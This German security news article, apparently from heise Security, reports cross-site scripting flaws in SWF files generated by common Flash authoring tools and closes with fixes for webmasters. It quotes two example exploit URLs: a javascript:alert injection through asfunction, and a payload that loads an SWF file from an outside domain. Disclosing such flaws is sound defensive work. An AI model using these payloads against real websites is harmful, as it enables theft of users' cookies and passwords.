Details zu SicherheitslĂĽcken in Flash-Applets
Mit populären Flash-Authoring-Tools erstellte Flash-Anwendungen können Cross-Site-Scripting-Schwachstellen aufweisen, mit denen Angreifer Cookies und Passwörter von Anwendern ausspionieren können.
- Daniel Bachfeld
Zu den Ende des vergangenen Jahres gemeldeten Sicherheitsproblemen aufgrund von Cross-Site-Scripting-Schwachstellen in Flash-Applets gibt es nun genauere Informationen. Offenbar lassen sich Fehler in verbreiteten Flash-Authoring-Tools ausnutzen, um Anwendern präparierten JavaScript-Code unterzuschieben und im Browser des Anwenders auszuführen. Angreifer können dadurch beispielsweise Cookies und Passwörter auslesen oder im Kontext der aufgerufenen Seite Aktionen durchführen, etwa Einträge in Blogs platzieren und Kommentare abgeben.
Zu den Tools gehören laut Bericht Adobe Dreamweaver, Adobe Acrobat Connect ehemals Macromedia Breeze, InfoSoft FusionCharts und Techsmith Camtasia. Die damit generierten SWF-Dateien seien auf zahlreichen Webseiten zu finden. Schätzungsweise mehrere hunderttausend Flash-Applets würden das Problem aufweisen, dabei sei ein nicht unerheblicher Prozentsatz großer, beliebter Webseiten betroffen – darunter auch Regierungs- und Online-Banking-Websites.
Das Problem ist laut Bericht aber nicht auf die genannten Tools begrenzt, dies seien nur diejenigen Produkte, bei denen der Hersteller den Fehler bereits mit einem Update korrigiert haben. Betroffen seien zudem Dienstleister wie Autodemo, die fĂĽr Kunden Flash-Anwendungen entwickeln und dabei offenbar ein verwundbares Tool einsetzen.
Das eigentliche Problem beruht laut Bericht auf der Einbettung fehlerhaften ActionScript-Codes in SWF-Dateien, mit denen sich bestimmte Funktionen steuern lassen. Dieser immer gleiche Code wird jedesmal bei Speichern oder Exportieren in eine SWF-Datei eingefügt. Der ActionScript-Code lässt sich missbrauchen, um ein als Argument übergebenes JavaScript im Sicherheitskontext der besuchten Seite auszuführen, obwohl der JavaScript-Code gar nicht von dort stammt, sondern von der Seite eines Angreifers. Dazu ist es aber notwendig, einen präparierten Link anzuklicken. Ein Link zum Ausnutzen einer XSS-Schwachstelle im Dreamweaver sieht beispielsweise so aus:
http://www.example.com/main.swf?baseurl=asfunction:getURL,javascript:alert(1)//
Ein Fehler in InfoSofts FusionCharts ermöglichte über folgenden Link sogar das Nachladen weiterer SWF-Dateien aus anderen Domains.
http://www.example.com/Example.swf?debugMode=1&dataURL=%27%3E%3Cimg+src%3D%22http%3A//cannings.org/DoKnowEvil.swf%3F.jpg%22%3E
Die im Dezember erschienene aktualisierte Fassung des Adobe Flash Players verhindert zumindest bei den Adobe-Produkten, dass Angreifer die Fehler über den asfunction-Protokoll-Handler ausnutzen können. Webmastern empfiehlt der Autor des Fehlerberichts, die verwundbaren Flash-Applets von den Seiten zu entfernen und mit fehlerbereinigten Versionen der Authoring-Tools neu zu erstellen. Zudem sollte man die an ActionScript übergebenen Nutzer-definierte Variablen bei allen URL-Funktionen genauer überprüfen. Mit dem Tool SWFIntruder können Entwickler zudem die Sicherheit ihrer Flash-Anwendungen testen.
Siehe dazu auch:
- XSS Vulnerabilities in Common Shockwave Flash Files, Bericht von Rich Cannings
- Cross-Site-Scripting: Datenklau ĂĽber Bande, Hintergrundartikel auf heise Security
- Passwortklau fĂĽr Dummies ... oder warum Cross Site Scripting wirklich ein Problem ist, Hintergrundartikel auf heise Security
(dab)
